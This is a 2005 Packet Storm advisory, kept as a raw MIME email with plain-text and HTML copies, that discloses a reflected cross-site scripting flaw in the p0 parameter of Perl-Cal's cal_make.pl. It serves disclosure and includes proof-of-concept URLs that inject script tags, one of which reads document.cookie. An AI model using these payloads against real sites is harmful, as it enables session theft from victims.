perl-cal-29920.txt

2005-12-14T00:00:00
ID PACKETSTORM:42250
Type packetstorm
Reporter Sumit Siddharth
Modified 2005-12-14T00:00:00

Description

                                        
                                            `------=_Part_17141_22617522.1134045408185  
Content-Type: text/plain; charset=ISO-8859-1  
Content-Transfer-Encoding: quoted-printable  
Content-Disposition: inline  
  
Vendor: Perl-Cal  
  
Version tested: Perl-Cal 2.99.20 , other versions may also be affected.  
  
Type: Cross Site Scripting  
  
Severity: Medium  
  
Vulnerability discovered:- 23rd Nov 2005  
  
Date released:-8 dec 2005  
  
Vulnerability Type: Input Validation Error  
  
Overview:- PerlCal is a CGI script written by Acme Software that allows  
web-based calendar sharing and related functions.There exists a cross-site  
scripting vulnerability as the input in one of the parameters(p0) is not  
filtered correctly.  
  
Description:- The cross-site scripting bug can be executed with a URL like  
so:  
  
http://localhost/cgi-bin/perlcal/cal_make.pl  
?p0=3D%3Cscript%3Ealert('hi');%3C/script%3E  
  
This issue could permit a remote attacker to create a malicious URL link  
that includes hostile HTML and script code. If this link were to be  
followed, the hostile code may be rendered in the web browser of the victim  
user. This would occur in the security context of the affected Web site.  
  
Demonstration:- http://localhost/cgi-bin/perlcal/cal_make.pl  
?p0=3D%3Cscript%3Ewindow.open('http://www.google.com');%3Cscript%3E<http://=  
www.google.com%27%29;%3Cscript%3E>  
  
Other attacks:-  
http://localhost/cgi-bin/perlcal/cal_make.pl  
?p0=3D%3Cscript%3Ealert(document.cookie);</script>  
  
Solution:  
--------------------  
Vendor has released a patch.  
  
Credits:- $um$id  
  
Sumit  
  
------=_Part_17141_22617522.1134045408185  
Content-Type: text/html; charset=ISO-8859-1  
Content-Transfer-Encoding: quoted-printable  
Content-Disposition: inline  
  
<br>  
Vendor: Perl-Cal<br>  
<br>  
Version tested: Perl-Cal 2.99.20 , other versions may also be affected.<br>  
<br>  
Type: Cross Site Scripting<br>  
<br>  
Severity: Medium<br>  
<br>  
Vulnerability discovered:- 23rd Nov 2005<br>  
<br>  
Date released:-8 dec 2005<br>  
<br>  
Vulnerability Type: Input Validation Error<br>  
<br>  
Overview:-  
PerlCal is a CGI script written by Acme Software that allows web-based  
calendar sharing and related functions.There exists a cross-site  
scripting vulnerability as the input in one of the parameters(p0) is not  
filtered correctly.<br>  
<br>  
Description:- The cross-site scripting bug can be executed with a URL like =  
so:<br>  
<br>  
<a href=3D"http://localhost/cgi-bin/perlcal/cal_make.pl" target=3D"_blank" =  
onclick=3D"return top.js.OpenExtLink(window,event,this)">http://localhost/c=  
gi-bin/perlcal/cal_make.pl</a><br>  
?p0=3D%3Cscript%3Ealert('hi');%3C/script%3E<br>  
<br>  
This  
issue could permit a remote attacker to create a malicious URL link  
that includes hostile HTML and script code. If this link were to be  
followed, the hostile code may be rendered in the web browser of the  
victim user. This would occur in the security context of the affected  
Web site.<br>  
<br>  
Demonstration:- <a href=3D"http://localhost/cgi-bin/perlcal/cal_make.pl" ta=  
rget=3D"_blank" onclick=3D"return top.js.OpenExtLink(window,event,this)">ht=  
tp://localhost/cgi-bin/perlcal/cal_make.pl</a><br>  
?p0=3D%3Cscript%3Ewindow.open('<a href=3D"http://www.google.com%27%29;%3Csc=  
ript%3E" target=3D"_blank" onclick=3D"return top.js.OpenExtLink(window,even=  
t,this)">http://www.google.com');%3Cscript%3E</a><br>  
<br>Other attacks:-<br>  
<a href=3D"http://localhost/cgi-bin/perlcal/cal_make.pl" target=3D"_blank" =  
onclick=3D"return top.js.OpenExtLink(window,event,this)">http://localhost/c=  
gi-bin/perlcal/cal_make.pl</a><br>  
  
?p0=3D%3Cscript%3Ealert(document.cookie);</script><br>  
<br>  
Solution:<br>  
--------------------<br>  
Vendor has released a patch.<br>  
<br>  
Credits:- $um$id<br>  
<br>  
Sumit<br>  
  
  
  
  
  
------=_Part_17141_22617522.1134045408185--  
`